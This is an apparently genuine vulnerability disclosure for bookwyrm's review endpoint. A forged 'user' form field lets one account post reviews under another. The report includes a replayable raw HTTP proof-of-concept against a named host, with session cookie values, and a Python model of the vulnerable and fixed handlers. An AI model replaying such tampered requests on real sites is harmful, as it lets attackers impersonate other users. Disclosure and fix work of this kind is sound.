Insecure direct object references in "review" function in bookwyrm-social/bookwyrm

Valid

Reported on

Jul 15th 2022


Description

An insecure direct object reference in the review-a-book function (`POST /post/review`) allows one user to create a review on behalf of another. The handler honours the `user` id submitted in the multipart form rather than the identity of the logged-in session, so an attacker only has to change that field to another account's id to have the review attributed to that account.

Proof of Concept

POST /post/review HTTP/2
Host: book.dansmonorage.blue
Cookie: csrftoken=bYsdqkQkkbYXZYRVd8AynhYxG1rBb2AoOfAO76XCYmgzXK3A266EpZamGcKL0pN5; django_language=None; sessionid=yq7gxnp9ypxohws3mmh1h7mrgogg6xsz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://book.dansmonorage.blue/
Content-Type: multipart/form-data; boundary=---------------------------269697065920795935563955484832
Content-Length: 1207
Origin: https://book.dansmonorage.blue
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: green
Te: trailers

-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="csrfmiddlewaretoken"

EEplsmJEq47ABzhShOKjf4PAbhjHG2YohVxW98QW4fpczltx6MgphM1pbsCRvpb5
-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="book"

60596
-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="user"

6847 // change to the target user's id
-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="reply_parent"


-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="name"

From id 6847
-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="rating"


-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="content"

My book1 <h1>123</h1>
-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="content_warning"


-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="privacy"

public
-----------------------------269697065920795935563955484832--
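To make the broken trust boundary concrete, the following is an added illustration written for this page; it is not bookwyrm's code. It is a framework-free Python model of a review-posting handler that parses the PoC body above, first with the vulnerable pattern (the author is whatever `user` id the form carries) and then with the hardened pattern (the author is always the authenticated session user, and a mismatching `user` field is rejected so tampering is visible). The attacker id 1001, the function names and the `Review` shape are assumptions made for the example; the boundary, field names and values are taken from the PoC.

```python
import re
from dataclasses import dataclass
from typing import Dict

# Boundary and field names copied from the proof-of-concept request above.
BOUNDARY = "---------------------------269697065920795935563955484832"

# Constructed sample: the attacker is logged in as hypothetical user 1001 but
# submits the victim's id 6847 in the form, exactly as the PoC does.
ATTACKER_ID = 1001
SAMPLE_FIELDS = {
    "csrfmiddlewaretoken": "EEplsmJEq47ABzhShOKjf4PAbhjHG2YohVxW98QW4fpczltx6MgphM1pbsCRvpb5",
    "book": "60596",
    "user": "6847",
    "reply_parent": "",
    "name": "From id 6847",
    "rating": "",
    "content": "My book1 <h1>123</h1>",
    "content_warning": "",
    "privacy": "public",
}


def form_body(fields: Dict[str, str], boundary: str = BOUNDARY) -> str:
    """Serialise text fields as a multipart/form-data body (no file parts)."""
    parts = [
        f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'
        for name, value in fields.items()
    ]
    return "".join(parts) + f"--{boundary}--\r\n"


def parse_multipart(body: str, boundary: str = BOUNDARY) -> Dict[str, str]:
    """Minimal parser for the text-only multipart body used by the PoC."""
    fields: Dict[str, str] = {}
    for part in body.split(f"--{boundary}"):
        part = part.strip("\r\n")
        if not part or part == "--":  # preamble or the closing delimiter
            continue
        headers, _, value = part.partition("\r\n\r\n")
        match = re.search(r'name="([^"]+)"', headers)
        if match:
            fields[match.group(1)] = value
    return fields


SAMPLE_BODY = form_body(SAMPLE_FIELDS)


@dataclass
class Review:
    book_id: int
    user_id: int
    name: str
    content: str
    privacy: str


class Forbidden(Exception):
    """Raised when a request tries to act as a different user."""


def post_review_vulnerable(session_user_id: int, fields: Dict[str, str]) -> Review:
    """IDOR: the session user is known but ignored; the form's `user` wins."""
    return Review(
        book_id=int(fields["book"]),
        user_id=int(fields["user"]),  # client-controlled, never checked
        name=fields["name"],
        content=fields["content"],
        privacy=fields["privacy"],
    )


def post_review_fixed(session_user_id: int, fields: Dict[str, str]) -> Review:
    """Hardened: the author is always the authenticated session user.

    A `user` field that disagrees with the session is rejected rather than
    silently overwritten, so tampering shows up in logs instead of vanishing.
    """
    submitted = fields.get("user")
    if submitted is not None and submitted != str(session_user_id):
        raise Forbidden(f"form user {submitted!r} != session user {session_user_id}")
    return Review(
        book_id=int(fields["book"]),
        user_id=session_user_id,  # server-side identity, not form data
        name=fields["name"],
        content=fields["content"],
        privacy=fields["privacy"],
    )


def run_demo() -> Dict[str, object]:
    """Replay the tampered PoC body against both handlers."""
    fields = parse_multipart(SAMPLE_BODY)
    vulnerable = post_review_vulnerable(ATTACKER_ID, fields)
    try:
        fixed = post_review_fixed(ATTACKER_ID, fields)
        fixed_outcome = f"stored as user {fixed.user_id}"
    except Forbidden as exc:
        fixed_outcome = f"rejected: {exc}"
    return {
        "form_user": fields["user"],
        "vulnerable_author": vulnerable.user_id,
        "fixed_outcome": fixed_outcome,
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Running the file replays the PoC body: the vulnerable handler stores the review as user 6847 while the session belongs to 1001, and the hardened handler refuses the same body. The same hardened handler still accepts a body whose `user` field equals the session id, so a well-behaved client is unaffected; the general rule is that ownership of a created object must come from the server-side session, never from a client-editable field.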

Impact

This vulnerability allows any authenticated user to post a review of a book under another user's account. Because the review is attributed to a user who never wrote it, it breaks the application's authorship logic and lets an attacker put content in other users' names.

We are processing your report and will contact the bookwyrm-social/bookwyrm team within 24 hours. 19 days ago
Mouse Reeve validated this vulnerability 19 days ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Mouse Reeve confirmed that a fix has been merged on b66ce2 19 days ago
The fix bounty has been dropped
Mouse Reeve gave praise 19 days ago
Thanks for catching these!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1